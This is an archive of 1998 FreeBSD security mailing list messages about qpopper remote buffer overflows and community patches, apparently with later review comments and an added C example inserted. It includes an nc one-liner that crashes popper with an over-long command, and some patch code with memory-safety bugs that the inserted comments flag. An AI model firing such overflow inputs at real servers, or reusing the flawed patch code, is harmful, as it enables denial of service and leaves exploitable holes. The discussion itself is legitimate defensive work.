From owner-freebsd-security Sun Jun 28 00:59:42 1998
From: "Vadim V. Chepkov"
To: freebsd-security@FreeBSD.ORG
Subject: Re: (FWD) QPOPPER REMOTE ROOT EXPLOIT
Date: Sun, 28 Jun 1998 10:59:00 +0300
Message-ID: <3595F7C4.650979D9@kharkiv.net>

Jordan K. Hubbard wrote:
>
> > There seems to be yet another similar buffer overflow
> > in pop_log.c
>
> Fixed.  Please cvsup the latest ports collection and make sure
> that ports/mail/popper is updated - all the new patches are in
> ports/mail/popper/patches/patch-ag.
>

Hello!

I did make that:

  Updating collection ports-all/cvs
   Edit ports/mail/popper/patches/patch-ag
    Add delta 1.4 98.06.27.20.47.27 ache
    Add delta 1.5 98.06.27.21.47.34 jkh

And now popper crashes immediately:

  # telnet localhost 110
  Trying 127.0.0.1...
  Connected to localhost
  Escape character is '^]'.
  Connection closed by foreign host.

  /kernel: pid 9696 (popper), uid 0: exited on signal 11 (core dumped)

Kind regards,
Vadim V. Chepkov
Kharkiv Online ISP
------------------------------------------------------
Vadim V. Chepkov, Kharkiv State Polytechnic University
21 Frunze Str., Kharkiv, Ukraine, 310002
Tel: +380 572 400279  Fax: +380 572 400592
e-mail: vvc@kharkiv.net  http://www.kharkiv.net/~vvc
------------------------------------------------------

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe security" in the body of the message

From owner-freebsd-security Sun Jun 28 01:42:37 1998
From: "Jordan K. Hubbard"
To: Igor Roshchin
cc: freebsd-security@FreeBSD.ORG, igor@alecto.physics.uiuc.edu (Igor Roshchin)
Subject: Re: (FWD) QPOPPER REMOTE ROOT EXPLOIT
In-reply-to: Your message of "Sat, 27 Jun 1998 19:23:54 CDT." <199806280023.TAA04462@alecto.physics.uiuc.edu>
Date: Sun, 28 Jun 1998 01:41:57 -0700
Message-ID: <4071.899023317@time.cdrom.com>

> I've just downloaded "popper" directory from
> ftp://ftp.freebsd.org/.25/FreeBSD/FreeBSD-current/ports/mail
> It is still missing patch for the "UIDL" problem
> (pop_dropcopy.c)
>
> Several people had suggestion looking like:
> if (strlen(cp) >= 128) cp[127] = 0;

I don't see the sense of this.  If you look at the code, the length of
this string is always known and the test suggested above would
accomplish *nothing*.
- Jordan

From owner-freebsd-security Sun Jun 28 01:47:05 1998
From: "Jordan K. Hubbard"
To: "Vadim V. Chepkov"
cc: freebsd-security@FreeBSD.ORG
Subject: Re: (FWD) QPOPPER REMOTE ROOT EXPLOIT
In-reply-to: Your message of "Sun, 28 Jun 1998 10:59:00 +0300." <3595F7C4.650979D9@kharkiv.net>
Date: Sun, 28 Jun 1998 01:45:49 -0700
Message-ID: <6102.899023549@time.cdrom.com>

> I did make that
>
> Updating collection ports-all/cvs
>  Edit ports/mail/popper/patches/patch-ag
>   Add delta 1.4 98.06.27.20.47.27 ache
>   Add delta 1.5 98.06.27.21.47.34 jkh
>
> And now popper crashes immediately

Get revision 1.6 of that patch file; this is now fixed, sorry folks!
- Jordan

From owner-freebsd-security Sun Jun 28 02:41:21 1998
From: "Jordan K. Hubbard"
To: "Vadim V. Chepkov"
cc: freebsd-security@FreeBSD.ORG
Subject: Re: (FWD) QPOPPER REMOTE ROOT EXPLOIT
In-reply-to: Your message of "Sun, 28 Jun 1998 12:21:22 +0300."
Date: Sun, 28 Jun 1998 02:31:13 -0700
Message-ID: <6363.899026273@time.cdrom.com>

> On Sun, 28 Jun 1998, Jordan K. Hubbard wrote:
>
> > Get revision 1.6 of that patch file; this is now fixed, sorry folks!
> >
>
> Hello!
>
> I did that, but it still crashes on overflow.

Well, I'm going to let you find this one then.  I don't even have the
*exploit* for this problem and the folks who are managing to induce
these overflows can run gdb on popper's post-mortem dumps a lot more
easily than I can.
:-)

- Jordan

From owner-freebsd-security Sun Jun 28 02:41:23 1998
Date: Sun, 28 Jun 1998 12:21:22 +0300 (EEST)
From: "Vadim V. Chepkov"
To: "Jordan K. Hubbard"
cc: freebsd-security@FreeBSD.ORG
Subject: Re: (FWD) QPOPPER REMOTE ROOT EXPLOIT
In-Reply-To: <6102.899023549@time.cdrom.com>

On Sun, 28 Jun 1998, Jordan K. Hubbard wrote:

> Get revision 1.6 of that patch file; this is now fixed, sorry folks!
>

Hello!

I did that, but it still crashes on overflow.

Kind regards,
Vadim V. Chepkov
Kharkiv Online ISP
------------------------------------------------------
Vadim V. Chepkov, Kharkiv State Polytechnic University
21 Frunze Str., Kharkiv, Ukraine, 310002
Tel: +380 572 400279  Fax: +380 572 400592
e-mail: vvc@kharkiv.net  http://www.kharkiv.net/~vvc
------------------------------------------------------

From owner-freebsd-security Sun Jun 28 06:43:33 1998
Message-ID: <19980628094706.A3612@abcinternet.net>
Date: Sun, 28 Jun 1998 09:47:06 -0400
From: Dan Jacobowitz
To: ache@FreeBSD.ORG, security@FreeBSD.ORG
Subject: qpopper

It seems that the latest patch-ag does not successfully address the
problem.  Why, I am not exactly sure - it looks like it should, from
here.  But it _does not_.

[1] mars:/u/drow# perl -e 'print "E"x2000,"\r\nQUIT\r\n";'| nc -i 2 0 110
+OK QPOP (version 2.41beta1) at mars.abcinternet.net starting.
<3556.899041328@mars.abcinternet.net> -ERR Unknown command: "eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee eeeeeeeeeeeeeeeeeeeeeeeeeeeeeee [1] mars:/u/drow# dmesg |tail -1 shows: pid 3556 (popper), uid 0: exited on signal 11 gdb shows that it is jumping to 0x0 instead of 'eeee', but that is still a very bad thing for a popper to do. 
Daniel Jacobowitz
drow@false.org

From owner-freebsd-security Sun Jun 28 09:14:24 1998
Date: Sun, 28 Jun 1998 12:11:33 -0400 (EDT)
From: John Dowdal
To: Dan Jacobowitz
cc: ache@FreeBSD.ORG, security@FreeBSD.ORG
Subject: Re: qpopper
In-Reply-To: <19980628094706.A3612@abcinternet.net>

On Sun, 28 Jun 1998, Dan Jacobowitz wrote:

> It seems that the latest patch-ag does not successfully address the
> problem.  Why, I am not exactly sure - it looks like it should, from
> here.  But it _does not_.
Actually the current patch (cvsupped at about 11pm EST on Saturday)
*always* core dumps, even with Netscape connecting and attempting to
download mail:

Jun 28 11:37:12 destiny /kernel: pid 29389 (popper), uid 0: exited on signal 11

John

From owner-freebsd-security Sun Jun 28 10:17:41 1998
Date: Sun, 28 Jun 1998 13:17:34 -0400 (EDT)
From: spork
To: "Aaron D. Gifford"
cc: security@FreeBSD.ORG
Subject: Re: popper popper and more popper (Included is a FIX to the not-working popper)
In-Reply-To: <3595D4F7.DDCF4E0E@infowest.com>

Hi,

I grabbed the MAXPARMLENGTH patch off of your post to Bugtraq yesterday,
and had no problems with it.  For whatever reason one patch didn't apply
clean, but I think that's just a problem with your mailer wrapping lines.

I've yet to see any ill effects from it...

Thanks,

Charles

Charles Sprickman
spork@super-g.com

----

On Sat, 27 Jun 1998, Aaron D. Gifford wrote:

> Hello,
>
> I don't know where this message really should go, but I have an additional bug fix
> for qpopper (at the bottom of this message), a suggested cosmetic change (the
> first part of this message), and an optional patch (middle of this message)
> for qpopper.
>
> ===== FIRST =====
> The purely cosmetic change first...  In the file pop_auth.c the line:
>
>   return (pop_msg(p,POP_FAILURE,"This command is not supported yet"));
>
> functions perfectly, but my log files keep getting messages like:
>
>   Jun 27 21:52:52 blah popper[22348]: @dialport05.xyzisp.org: -ERR This
>   command is not supported yet
>
> Before I grokked the popper source code, I had NO CLUE what this meant.  After
> changing the above line of code thus:
>
>   return (pop_msg(p,POP_FAILURE,"The auth command is not supported yet"));
>
> my log files are completely comprehensible without having to look at the
> popper source code.
>
>
> ===== SECOND =====
> Now for the second change, the optional patch.  Take it with a grain of salt.
> I personally like it and think it improves the security and handling of
> untrusted data from the POP client.  It MIGHT violate the POP3 RFC even though
> it does not break any of the POP clients I've tested (Eudora, Netscape mail,
> and MS Internet Mail).
>
> In looking at the recent buffer overflows, I noticed that popper.h had an
> interesting define:
>
>   #define MAXPARMLEN 10
>
> Yet if you grep for MAXPARMLEN, it ONLY shows up in the header file.  I highly
> suspect that the qpopper author(s) intended to limit POP commands and
> parameters to this length but never implemented it.  Here's a quick patch that
> implements this feature.  Had it been implemented in the first place, the
> recent buffer exploits would have been more difficult or perhaps even
> impossible.  It may be that such an implementation may violate an RFC (I
> haven't read the POP3 definition).  I don't know.
> > Perhaps you might only include the patch as an additonal optional patch with a > brief note in the README for those who want to add this functionality. I have > been running the patch below on a moderate volume 6,000 user system without > any trouble. > > Here it is: > > diff -p popper.h popper.new.h > *** popper.h Sat Jun 27 22:46:59 1998 > --- popper.new.h Sat Jun 27 22:47:09 1998 > *************** > *** 59,65 **** > #define MAXMSGLINELEN MAXLINELEN > #define MAXCMDLEN 4 > #define MAXPARMCOUNT 5 > ! #define MAXPARMLEN 10 > #define ALLOC_MSGS 20 > > #ifndef OSF1 > --- 59,65 ---- > #define MAXMSGLINELEN MAXLINELEN > #define MAXCMDLEN 4 > #define MAXPARMCOUNT 5 > ! #define MAXPARMLEN 16 > #define ALLOC_MSGS 20 > > #ifndef OSF1 > diff -p pop_parse.c pop_parse.new.c > *** pop_parse.c Wed Nov 19 14:20:38 1997 > --- pop_parse.new.c Sat Jun 27 22:58:17 1998 > *************** char * buf; /* Pointer > *** 26,31 **** > --- 26,32 ---- > { > char * mp; > register int i; > + register int parmlen; > > /* Loop through the POP command array */ > for (mp = buf, i = 0; ; i++) { > *************** char * buf; /* Pointer > *** 45,52 **** > /* Point to the start of the token */ > p->pop_parm[i] = mp; > > /* Search for the first space character (end of the token) */ > ! while (!isspace(*mp) && *mp) mp++; > > /* Delimit the token with a null */ > if (*mp) *mp++ = 0; > --- 46,75 ---- > /* Point to the start of the token */ > p->pop_parm[i] = mp; > > + /* Start counting the length of this token */ > + parmlen = 0; > + > /* Search for the first space character (end of the token) */ > ! while (!isspace(*mp) && *mp) { > ! mp++; > ! parmlen++; > ! if (parmlen > MAXPARMLEN) { > ! /* Truncate parameter to the max. allowable size */ > ! *mp = '\0'; > ! > ! /* Fail with an appropriate message */ > ! if (i == 0) { > ! pop_msg(p,POP_FAILURE, > ! "Command \"%s\" (truncated) exceedes maximum > permitted size.", > ! p->pop_command); > ! } else { > ! pop_msg(p,POP_FAILURE, > ! 
"Argument %d \"%s\" (truncated) exceeds maximum > permitted size.", > ! i, p->pop_parm[i]); > ! } > ! return(-1); > ! } > ! } > > /* Delimit the token with a null */ > if (*mp) *mp++ = 0;
>
>
> ===== LAST the BUG FIX (Two parts) =====
> Last of all, I have a few problems with patch-ag.  First, in a patched
> pop_msg.c, beginning at line 92:
>
>   /* Append the */
>   len -= strlen(message);
>   (void)strncat(message, len, "\r\n");
>
> Before the above assignment:
>   len == sizeof(message) - strlen(stat == POP_SUCCESS ? POP_OK : POP_ERR)
>
> After the assignment:
>   len == sizeof(message) - strlen(stat == POP_SUCCESS ? POP_OK : POP_ERR) -
>          strlen(message)
>
> That means that if:
>   stat == POP_SUCCESS
>   strlen(POP_OK) == 5
>   sizeof(message) == 1024
>   assume that vsnprintf(mp,len,format,ap) appends a VERY LARGE
>   string with a strlen of 1018 to message
>
> Then the before and after would be:
>   BEFORE: len == 1019 (or 1024 - 5)
>   AFTER:  len == -4 (or 1019 - 1023)
>
> The strlen(stat == POP_SUCCESS ? POP_OK : POP_ERR) essentially gets subtracted
> twice by the code, once above the v/snprintf()'s and again afterward.
>
> I believe the code should instead read beginning at line 92:
>
>   /* Append the */
>   len -= strlen(mp);
>   (void)strncat(message, "\r\n", len);
>
> There is also the possibility that the strncat() will fail to append the
> "\r\n" in extreme cases because there's not enough buffer length left.  I
> believe this should not be allowed to happen.
>
> **** BIG NOTE ****
> The problems reported today about popper not working after Jordan's patches
> occur because the new call to strncat() mistakenly transposes the "\r\n" and
> len parameters.  The correct parameter order is as I show in my above code.
> This fixes this problem and lets popper work normally.
> **** END NOTE ****
>
> The pop_msg.c code at line 62 as currently patched reads:
>
>   /* Point past the POP status indicator in the message message */
>   l = strlen(mp);
>   len -= l, mp += l;
>
> I would instead do:
>
>   /* Point past the POP status indicator in the message message */
>   l = strlen(mp);
>   mp += l;
>   /*
>    * Subtract an additional 2 from the remaining buffer length
>    * so that after the vsnprintf()/snprintf() calls there will
>    * still be enough buffer space to append a "\r\n" even in a
>    * worst-case scenario.
>    */
>   len -= l - 2;
>
> Why?  By pre-removing 2 chars from the buffer maximum limit, there should
> always be room left for the "\r\n" appended later on.  I believe this would be
> the "right" thing to do.  It guarantees that the POP client will always be
> sent the expected "\r\n" sequence even in abnormal cases.
>
> On a mostly unrelated note, many many kudos and thanks to the entire FreeBSD
> core team and to all contributors!  I use FreeBSD as the core OS for InfoWest,
> a local ISP I work for and it is ROCK SOLID!  I also run it at home and now
> RARELY ever boot to Windows.
>
> Sincerely,
> Aaron Gifford

From owner-freebsd-security Sun Jun 28 11:53:13 1998
Message-Id: <199806281852.MAA22990@infowest.com>
Date: Sun, 28 Jun 1998 02:04:53 -0600
From: "Aaron D. Gifford"
Subject: Re: popper popper and more popper (Included is a FIX to the not-working popper)

spork@super-g.com wrote:
>
> Hi,
>
> I grabbed the MAXPARMLENGTH patch off of your post to Bugtraq yesterday,
> and had no problems with it.  For whatever reason one patch didn't apply
> clean, but I think that's just a problem with your mailer wrapping lines.
>
> I've yet to see any ill effects from it...
>
> Thanks,
>
> Charles
>
> Charles Sprickman
> spork@super-g.com
>
> > > #define MAXPARMLEN 16
>

You may want to bump MAXPARMLEN up to 32 if you have any POP users who use
APOP authentication so that the APOP MD5 parameter will be accepted.

Aaron out.
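The pop_msg() length accounting that Aaron's quoted message walks through, as an added example that is not qpopper's code and not from the original post: reply_remaining_buggy() reproduces the double subtraction that drives `len` negative, and pop_reply() is one way to assemble a status line so that an over-long body is truncated while the trailing "\r\n" always fits. POP_OK/POP_ERR are assumed to be "+OK"/"-ERR" as in qpopper; REPLY_MAX, the function names and the constructed inputs are this example's own.

```c
/*
 * Added example, not qpopper code: bounded assembly of a POP3 reply line.
 * Assumptions: POP_OK/POP_ERR are "+OK"/"-ERR" as in qpopper; REPLY_MAX,
 * the function names and the inputs below are this example's own.
 */
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define POP_OK    "+OK"
#define POP_ERR   "-ERR"
#define REPLY_MAX 64   /* deliberately small so truncation is easy to trigger */

/*
 * The accounting the quoted message describes: `len` starts as the buffer
 * size, the status prefix length is subtracted once before the body is
 * formatted, and then strlen() of the WHOLE message (prefix included) is
 * subtracted again afterwards.  Returns the resulting "remaining" count,
 * which goes negative for a long body and was then handed to strncat().
 */
long reply_remaining_buggy(size_t bufsize, const char *prefix, size_t bodylen)
{
    long len = (long)bufsize;
    size_t plen = strlen(prefix);
    size_t written;

    len -= (long)plen;                 /* len -= l;  (before vsnprintf) */
    written = plen + bodylen;          /* what strlen(message) sees ... */
    if (written > bufsize - 1)         /* ... after vsnprintf truncated it */
        written = bufsize - 1;
    len -= (long)written;              /* len -= strlen(message): prefix again */
    return len;
}

/*
 * Corrected accounting: reserve the two CRLF bytes before formatting, give
 * the formatter only what is left, then append "\r\n" from the buffer's
 * own free space.  Returns the final length of `out`, or -1 when `outsz`
 * cannot hold even "<status> \r\n" plus the terminating NUL.
 */
int pop_reply(char *out, size_t outsz, int ok, const char *fmt, ...)
{
    const char *status = ok ? POP_OK : POP_ERR;
    size_t need = strlen(status) + 1 + 2 + 1;   /* status, space, CRLF, NUL */
    size_t n, len, used;

    if (outsz < need)
        return -1;

    n = (size_t)snprintf(out, outsz, "%s ", status);  /* n < outsz, checked above */
    len = outsz - n - 2;               /* body + NUL may use this much; CRLF reserved */

    if (fmt) {
        va_list ap;
        va_start(ap, fmt);
        (void)vsnprintf(out + n, len, fmt, ap);   /* truncates body, keeps NUL */
        va_end(ap);
    }

    /* strncat()'s count excludes the NUL it writes, hence the -1; the
     * reservation above guarantees at least 2 characters of room here. */
    used = strlen(out);
    (void)strncat(out, "\r\n", outsz - used - 1);
    return (int)strlen(out);
}

/* True when `s` ends with the CRLF a POP3 client expects. */
int ends_with_crlf(const char *s)
{
    size_t n = strlen(s);
    return n >= 2 && s[n - 2] == '\r' && s[n - 1] == '\n';
}

/* Constructed input: an over-long "command" echoed back in an -ERR reply,
 * the shape of the 2000 x "E" test posted earlier in this thread. */
int demo_long_error_reply(char *out, size_t outsz)
{
    char cmd[101];
    memset(cmd, 'e', 100);
    cmd[100] = '\0';
    return pop_reply(out, outsz, 0, "Unknown command: \"%s\"", cmd);
}

int main(void)
{
    char reply[REPLY_MAX];
    int n = demo_long_error_reply(reply, sizeof reply);
    printf("%d bytes, CRLF terminated: %s\n", n, ends_with_crlf(reply) ? "yes" : "no");
    printf("buggy remaining count for a 1018-byte body: %ld\n",
           reply_remaining_buggy(1024, "+OK ", 1018));
    return 0;
}
```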
From owner-freebsd-security Sun Jun 28 12:25:38 1998
Message-Id: <199806281925.NAA24567@infowest.com>
Subject: UIDL overruns in qpopper
From: "Aaron D. Gifford"
Date: Sun, 28 Jun 1998 03:42:25 -0600

When I first saw patches for pop_dropcopy.c that limit the uidl string
length to 128, I couldn't see any overrun potential there.  Then Miquel van
Smoorenburg explained that the actual overrun occurs in pop_uidl.c but can
be prevented in pop_dropcopy.c.  I looked at pop_uidl.c and sure enough,
Miquel was correct.  Further investigation revealed that another potential
buffer overrun can occur in some cases where a huge From: header occurs and
the EUIDL command is used by a POP client.

The patch below constitutes several changes I use on my FreeBSD boxen.  It
includes a fix for the signal 11 problem that some have reported after
patch-ag is applied.  It includes a POP parameter limiting patch which you
might want to avoid (it is the patch to the pop_parse.c file) -- I like it
and it has been working on a 5,000-user system with no known problems yet
-- but it might break something I don't know about or violate POP protocol.
It includes a fix to the UIDL overrun by limiting the size of the UIDL data
in pop_dropcopy.c.
It also fixes another potential UIDL overrun by reducing a buffer in
pop_uidl.c.  Finally, it also includes 2 cosmetic fixes that I like because
my log files are more readable -- one change to pop_init.c and another to
pop_auth.c.  Whew!

Please be aware that my mail software might wrap a line or two of the patch
when I send this and cause it to break.

Here goes:

==========
diff -p work/qpopper2.41beta1/pop_auth.c work2/qpopper2.41beta1/pop_auth.c *** work/qpopper2.41beta1/pop_auth.c Wed Nov 19 14:20:38 1997 --- work2/qpopper2.41beta1/pop_auth.c Sat Jun 27 23:34:14 1998 *************** int pop_auth (p) *** 23,29 **** POP * p; { /* Tell the user that this command is not supported */ ! return (pop_msg(p,POP_FAILURE,"This command is not supported yet")); } --- 23,29 ---- POP * p; { /* Tell the user that this command is not supported */ ! return (pop_msg(p,POP_FAILURE,"The auth command is not supported yet")); } diff -p work/qpopper2.41beta1/pop_dropcopy.c work2/qpopper2.41beta1/pop_dropcopy.c *** work/qpopper2.41beta1/pop_dropcopy.c Sun Jun 28 12:58:14 1998 --- work2/qpopper2.41beta1/pop_dropcopy.c Sun Jun 28 13:07:47 1998 *************** POP *p; *** 489,495 **** /* Skip over header string */ cp = &buffer[7]; while (*cp && (*cp == ' ' || *cp == '\t')) cp++; ! if(strlen(cp) < DIG_SIZE) /* To account for the empty UIDL string */ { uidl_found--; /*roll over as though it hasn't seen anything*/ continue; --- 489,501 ---- /* Skip over header string */ cp = &buffer[7]; while (*cp && (*cp == ' ' || *cp == '\t')) cp++; ! /* ! * The UIDL digest SHOULD be approx. 32 chars long, ! * so reject/skip any X-UIDL: lines that don't fit ! * this profile. A new X-UIDL: line will be created ! * for any messages that don't have a valid one. ! */ !
if(strlen(cp) < DIG_SIZE || strlen(cp) > DIG_SIZE * 3) { uidl_found--; /*roll over as though it hasn't seen anything*/ continue; diff -p work/qpopper2.41beta1/pop_init.c work2/qpopper2.41beta1/pop_init.c *** work/qpopper2.41beta1/pop_init.c Wed Nov 19 14:20:38 1997 --- work2/qpopper2.41beta1/pop_init.c Sat Jun 27 23:38:54 1998 *************** char ** argmessage; *** 281,288 **** ch = gethostbyaddr((char *) &cs.sin_addr, sizeof(cs.sin_addr), AF_INET); if (ch == NULL){ pop_log(p,POP_PRIORITY, ! "(v%s) Unable to get canonical name of client, err = %d", ! VERSION, errno); p->client = p->ipaddr; } /* Save the cannonical name of the client host in --- 281,288 ---- ch = gethostbyaddr((char *) &cs.sin_addr, sizeof(cs.sin_addr), AF_INET); if (ch == NULL){ pop_log(p,POP_PRIORITY, ! "(v%s) Unable to get canonical name of client [%], err = %d", ! VERSION, p->ipaddr, errno); p->client = p->ipaddr; } /* Save the cannonical name of the client host in diff -p work/qpopper2.41beta1/pop_msg.c work2/qpopper2.41beta1/pop_msg.c *** work/qpopper2.41beta1/pop_msg.c Sun Jun 28 12:58:15 1998 --- work2/qpopper2.41beta1/pop_msg.c Sat Jun 27 23:25:59 1998 *************** va_dcl *** 61,67 **** /* Point past the POP status indicator in the message message */ l = strlen(mp); ! len -= l, mp += l; /* Append the message (formatted, if necessary) */ if (format) --- 61,74 ---- /* Point past the POP status indicator in the message message */ l = strlen(mp); ! mp += l; ! /* ! * Subtract an additional 2 from the remaining buffer length ! * so that after the vsnprintf()/snprintf() calls there will ! * still be enough buffer space to append a "\r\n" even in a ! * worst-case scenario. ! */ ! len -= l - 2; /* Append the message (formatted, if necessary) */ if (format) *************** va_dcl *** 90,97 **** (p->user ? p->user : "(null)"), p->client, message); /* Append the */ ! len -= strlen(message); ! 
(void)strncat(message, len, "\r\n"); /* Send the message to the client */ (void)fputs(message,p->output); --- 97,104 ---- (p->user ? p->user : "(null)"), p->client, message); /* Append the */ ! len -= strlen(mp); ! (void)strncat(message, "\r\n", len); /* Send the message to the client */ (void)fputs(message,p->output); diff -p work/qpopper2.41beta1/pop_parse.c work2/qpopper2.41beta1/pop_parse.c *** work/qpopper2.41beta1/pop_parse.c Wed Nov 19 14:20:38 1997 --- work2/qpopper2.41beta1/pop_parse.c Sat Jun 27 22:58:17 1998 *************** char * buf; /* Pointer *** 26,31 **** --- 26,32 ---- { char * mp; register int i; + register int parmlen; /* Loop through the POP command array */ for (mp = buf, i = 0; ; i++) { *************** char * buf; /* Pointer *** 45,52 **** /* Point to the start of the token */ p->pop_parm[i] = mp; /* Search for the first space character (end of the token) */ ! while (!isspace(*mp) && *mp) mp++; /* Delimit the token with a null */ if (*mp) *mp++ = 0; --- 46,75 ---- /* Point to the start of the token */ p->pop_parm[i] = mp; + /* Start counting the length of this token */ + parmlen = 0; + /* Search for the first space character (end of the token) */ ! while (!isspace(*mp) && *mp) { ! mp++; ! parmlen++; ! if (parmlen > MAXPARMLEN) { ! /* Truncate parameter to the max. allowable size */ ! *mp = '\0'; ! ! /* Fail with an appropriate message */ ! if (i == 0) { ! pop_msg(p,POP_FAILURE, ! "Command \"%s\" (truncated) exceedes maximum permitted size.", ! p->pop_command); ! } else { ! pop_msg(p,POP_FAILURE, ! "Argument %d \"%s\" (truncated) exceeds maximum permitted size.", ! i, p->pop_parm[i]); ! } ! return(-1); ! } ! } /* Delimit the token with a null */ if (*mp) *mp++ = 0; diff -p work/qpopper2.41beta1/pop_uidl.c work2/qpopper2.41beta1/pop_uidl.c *** work/qpopper2.41beta1/pop_uidl.c Wed Nov 19 14:20:38 1997 --- work2/qpopper2.41beta1/pop_uidl.c Sun Jun 28 13:09:56 1998 *************** from_hdr(p, mp) *** 101,107 **** POP *p; MsgInfoList *mp; { ! 
char buf[MAXLINELEN], *cp; fseek(p->drop, mp->offset, 0); while (fgets(buf, sizeof(buf), p->drop) != NULL) { --- 101,112 ---- POP *p; MsgInfoList *mp; { ! /* ! * Shorten this buffer so that an extra-long From: header ! * won't overflow the buffers in the pop_euidl() where ! * this function is called. 128 should be sufficient. ! */ ! static char buf[MAXLINELEN - 128], *cp; fseek(p->drop, mp->offset, 0); while (fgets(buf, sizeof(buf), p->drop) != NULL) { diff -p work/qpopper2.41beta1/popper.h work2/qpopper2.41beta1/popper.h *** work/qpopper2.41beta1/popper.h Sun Jun 28 12:58:15 1998 --- work2/qpopper2.41beta1/popper.h Sun Jun 28 11:56:10 1998 *************** *** 59,65 **** #define MAXMSGLINELEN MAXLINELEN #define MAXCMDLEN 4 #define MAXPARMCOUNT 5 ! #define MAXPARMLEN 10 #define ALLOC_MSGS 20 #ifndef OSF1 --- 59,65 ---- #define MAXMSGLINELEN MAXLINELEN #define MAXCMDLEN 4 #define MAXPARMCOUNT 5 ! #define MAXPARMLEN 32 /* Large enough for 32-byte APOP parm. */ #define ALLOC_MSGS 20 #ifndef OSF1 Have fun, but not too much! ;) Aaron out. 
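Review bot: in the pop_dropcopy.c hunk, the new upper bound `strlen(cp) > DIG_SIZE * 3` is a guess at the digest's expected length rather than the size of the pop_uidl.c buffer that, per the cover note, actually overruns; derive the limit from that destination's size (or bound the copy in pop_uidl.c itself with the destination size) so the two cannot drift apart, and evaluate `strlen(cp)` once into a local instead of twice in the same condition.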
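Review bot: in the pop_init.c hunk, `[%]` in the new pop_log() format string is not a conversion specification, so the added `p->ipaddr` argument is never consumed and the call has undefined behaviour; the line should read `"(v%s) Unable to get canonical name of client [%s], err = %d"` with `VERSION, p->ipaddr, errno` as now.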
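Review bot: in the first pop_msg.c hunk (lines 61,67), `len -= l - 2;` does the opposite of what the comment above it says: it is `len = len - l + 2`, so the size offered to vsnprintf()/snprintf() is two bytes larger than what actually remains in `message`, and an over-long reply can now write two bytes past the end of the buffer instead of leaving room for the "\r\n". Reserving two bytes is `len -= l + 2;`.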
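Review bot: in the second pop_msg.c hunk (lines 90,97), the argument-order fix is right (the old `strncat(message, len, "\r\n")` is what was crashing popper), but `len` is the wrong count for strncat(): its third argument is the number of characters to append, excluding the NUL it always writes, and after the first hunk `len` no longer tracks the real free space (it is off by the two reserved bytes in whichever direction that hunk ends up). Compute the count from the buffer itself, `(void)strncat(message, "\r\n", sizeof(message) - strlen(message) - 1);`, which cannot overrun and, once the reservation in the first hunk is correct, always appends both characters.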
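Review bot: in the pop_parse.c hunk, the `parmlen > MAXPARMLEN` test runs after `mp++; parmlen++;`, so the NUL is written after the (MAXPARMLEN + 1)th character and the "(truncated)" token echoed in the error message is one character longer than the limit; the rejection itself is correct (a token of exactly MAXPARMLEN characters is still accepted, which APOP needs), only the echoed text is off by one. Also, the `i == 0` branch spells it "exceedes" while the `else` branch spells it "exceeds".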
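Review bot: in the pop_uidl.c hunk, shrinking `buf` to `MAXLINELEN - 128` (and making it `static`) protects the buffers in pop_euidl() only for as long as they stay at least that large, and it has a side effect: fgets() now stops 128 bytes earlier on a long From: line, and the remainder of that line is returned by the next fgets() call and scanned as though it were a fresh header line. The bound belongs at the copy into pop_euidl()'s buffers (a length-limited copy sized by the destination), with `buf` left at MAXLINELEN so whole lines are still consumed.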
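Review bot: in the popper.h hunk, 32 is the floor for MAXPARMLEN, not a comfortable value: it is exactly the 32 hex digits of the APOP digest, and RFC 1939 section 3 allows each argument to be up to 40 characters, so a conforming client sending a 33- to 40-character password or user name is now rejected by the pop_parse.c check. Use 40 (or more) and say in the comment that the value comes from the RFC rather than from APOP.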
From owner-freebsd-security Sun Jun 28 23:32:36 1998
Date: Mon, 29 Jun 1998 08:32:34 +0200 (MEST)
From: Christoph Kukulies
Message-Id: <199806290632.IAA00836@gilberto.physik.RWTH-Aachen.DE>
To: freebsd-security@FreeBSD.ORG
Subject: xlock

Alarmed by recent buffer overflow attacks on Linux machines in my vicinity
(an exploit for this is available) I thought about xlock under FreeBSD and
would like to know whether the security hole has been sorted out under
FreeBSD 2.2.x or what measures are advised to prevent it.

--
Chris
Christoph P. U. Kukulies  kuku@gil.physik.rwth-aachen.de

From owner-freebsd-security Sun Jun 28 23:58:22 1998
To: Christoph Kukulies
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: xlock
References: <199806290632.IAA00836@gilberto.physik.RWTH-Aachen.DE>
From: Thomas Gellekum
Date: 29 Jun 1998 08:58:02 +0200
In-Reply-To: Christoph Kukulies's message of "Mon, 29 Jun 1998 08:32:34 +0200 (MEST)"
Message-ID: <87btrcy9s5.fsf@ghpc6.ihf.rwth-aachen.de>

Christoph Kukulies writes:

